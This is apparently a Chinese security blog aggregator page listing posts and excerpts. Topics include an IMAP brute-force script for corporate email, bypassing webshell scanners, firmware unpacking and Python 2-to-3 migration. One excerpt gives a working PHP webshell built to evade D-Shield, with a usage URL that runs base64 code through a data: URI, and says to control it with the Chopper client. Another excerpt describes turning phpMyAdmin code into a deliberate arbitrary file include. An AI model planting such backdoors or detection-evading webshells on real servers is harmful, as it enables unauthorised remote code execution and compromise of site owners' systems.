Aggregator
Build Your Immunity Across All App-Security Insertion Points
企业邮箱爆破脚本
IMAP(Internet Mail Access Protocol)以前称作交互邮件访问协议(Interactive Mail Access Protocol),是一个应用层协议。IMAP是斯坦福大学在1986年开发的一种邮件获取协议。它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。当前的权威定义是RFC3501。IMAP协议运行在TCP/IP协议之上,使用的端口是143。它与POP3协议的主要区别是用户可以不用把所有的邮件全部下载,可以通过客户端直接对服务器上的邮件进行操作。----来源于百度百科
目前知名企业邮箱(如腾讯企业邮箱)均支持该协议,许多人喜欢用邮件客户端或者手机收发邮件,则大多数会选择开启该服务。在大多数情况下适用。(文末有脚本下载地址)。
该脚本使用Python开发,2和3版本均可运行。
云安全的未来
如何实现一个基于 Golang 的 webshell?
小爱控制HA上的开关(红外线)
在 Windows 和 Linux 系统上禁用 LLMNR 以及 NetBIOS
调整 Proxmox LVM 容量
用 GCC 编译一个完全不安全的二进制文件
linux 内核提权总结(demo+exp分析) -- ROP(一)
Java动态类加载,当FastJson遇上内网
Java动态类加载,当FastJson遇到内网
Is the Cloud Safe? Part 2: Breach Highlights for the Past 3 Years
2019 总结
青藤云Webshell查杀绕过
上周看到一些朋友在发青藤云的聊天记录,绕过一个发200块红包。周末的时候就简单做了个测试。
首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序进行修改,带入一句话后门代码。
记得Phpmyadmin的index.php文件中包含有include ROOT_PATH . $_REQUEST['target'];这样的代码,如果不看上下文,这个妥妥的文件包含漏洞。不过上文有过滤和判断处理,导致无法包含任意文件。我将其修改为包含任意文件。同时保留来一些源码,把影响执行的代码注释掉(因为适应多种环境,适用但文件的情况)。
最终修改的代码如下:
Laravel 的 Facades 实现原理
日志分析系列(外传二):Nginx日志统一化
固件提取系列-UBI文件系统提取以及重打包
去年写的,不小心把github仓库弄成私有,Readme没了,重新传了个Readme,觉得有点不好意思。先把这篇文章放出来吧
UBI(Unsorted Block Image
最新绕过D盾的php Webshell
去年分析D盾的查杀规律弄的绕过。
查杀效果:
具体请看代码:
<?php function cc(){ global $b; $a =$_GET[$b]; //此处可改成POST方式 $str =$a; return $str; } ?> <?php $b="url"; $c=cc(); $aa = $c; include($aa);传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带<?php,然后将代码进行base64编码传入。这里的例子是<?php phpinfo(); ?>,实战中可以把代码改成一句话,然后使用菜刀连接即可。
Python2与Python3差异之print
时代在发展,技术在进步。没有什么是停止不前的!2019年已经接近尾声,Python2停止更新的时间越来越近。其中比较流行的如 NumPy、Requests 和 TensorFlow 等承诺到 2020 年将停止支持2.x。尽管迁移过程也会花许多时间与精力,但是转Python3是早晚都要面对的。最近在迁移自己的代码到Python3,对于迁移的过程中遇到的情况进行总结。
首先我们来说一下常用的print。
最明显的区别就在于,我们在2.x版本中的print "hello world" ,在3.x版本中会报错。必须要以print("hello world")这样的格式。为什么会发生这样的变化呢?下面就让我们来看一下~